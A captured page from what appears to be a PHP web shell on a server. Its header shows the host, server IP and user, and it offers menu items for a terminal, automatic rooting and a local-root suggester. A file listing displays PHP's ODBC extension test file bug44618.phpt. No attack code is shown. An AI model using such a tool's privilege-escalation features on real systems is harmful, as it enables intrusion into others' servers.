Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
odbc /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
CONFLICTS
5
B
-rw-rw-r--
2022-10-31 11:36
bug44618.phpt
1.61
KB
-rw-rw-r--
2022-10-31 11:36
bug46050.phpt
532
B
-rw-rw-r--
2022-10-31 11:36
bug47803.phpt
3.26
KB
-rw-rw-r--
2022-10-31 11:36
bug60616.phpt
1.97
KB
-rw-rw-r--
2022-10-31 11:36
bug68087.phpt
1.22
KB
-rw-rw-r--
2022-10-31 11:36
bug69354.phpt
845
B
-rw-rw-r--
2022-10-31 11:36
bug69975.phpt
726
B
-rw-rw-r--
2022-10-31 11:36
bug71171.phpt
838
B
-rw-rw-r--
2022-10-31 11:36
bug73448.phpt
1.14
KB
-rw-rw-r--
2022-10-31 11:36
bug73725.phpt
947
B
-rw-rw-r--
2022-10-31 11:36
bug78470.phpt
342
B
-rw-rw-r--
2022-10-31 11:36
bug78473.phpt
343
B
-rw-rw-r--
2022-10-31 11:36
bug80147.phpt
677
B
-rw-rw-r--
2022-10-31 11:36
bug80152.phpt
598
B
-rw-rw-r--
2022-10-31 11:36
config.inc
292
B
-rw-rw-r--
2022-10-31 11:36
odbc_columnprivileges_001.phpt
651
B
-rw-rw-r--
2022-10-31 11:36
odbc_columns_001.phpt
615
B
-rw-rw-r--
2022-10-31 11:36
odbc_data_source_001.phpt
621
B
-rw-rw-r--
2022-10-31 11:36
odbc_exec_001.phpt
950
B
-rw-rw-r--
2022-10-31 11:36
odbc_exec_002.phpt
678
B
-rw-rw-r--
2022-10-31 11:36
odbc_free_result_001.phpt
1.25
KB
-rw-rw-r--
2022-10-31 11:36
odbc_tables_001.phpt
612
B
-rw-rw-r--
2022-10-31 11:36
skipif.inc
192
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug #44618 (Fetching may rely on uninitialized data) --SKIPIF-- <?php include 'skipif.inc'; ?> --FILE-- <?php include __DIR__ . "/config.inc"; $conn = odbc_connect($dsn, $user, $pass, SQL_CUR_USE_ODBC); odbc_exec($conn, "CREATE TABLE bug44618(ID INT, real1 REAL, text1 TEXT)"); odbc_exec($conn, "INSERT INTO bug44618 VALUES (1, 10.0199995, 'testing 1,2,3')"); $result = odbc_exec($conn, "SELECT * FROM bug44618"); var_dump(odbc_fetch_array($result)); $result = null; $result = odbc_exec($conn, "SELECT * FROM bug44618"); odbc_fetch_into($result, $array); var_dump($array); $result = null; $result = odbc_exec($conn, "SELECT * FROM bug44618"); odbc_fetch_row($result); var_dump(odbc_result($result, "text1")); $result = null; $result = odbc_exec($conn, "SELECT * FROM bug44618"); odbc_result_all($result); $result = null; ?> --CLEAN-- <?php include __DIR__ . "/config.inc"; $conn = odbc_connect($dsn, $user, $pass); odbc_exec($conn, "DROP TABLE bug44618"); ?> --EXPECTF-- Warning: odbc_fetch_array(): Cannot get data of column #3 (retcode 100) in %s on line %d array(3) { ["ID"]=> string(1) "1" ["real1"]=> string(5) "10.02" ["text1"]=> bool(false) } Warning: odbc_fetch_into(): Cannot get data of column #3 (retcode 100) in %s on line %d array(3) { [0]=> string(1) "1" [1]=> string(5) "10.02" [2]=> bool(false) } Warning: odbc_result(): Cannot get data of column #3 (retcode 100) in %s on line %d bool(false) <table><tr><th>ID</th><th>real1</th><th>text1</th></tr> <tr><td>1</td><td>10.02</td><td></td></tr></table> Warning: odbc_result_all(): Cannot get data of column #3 (retcode 100) in %s on line %d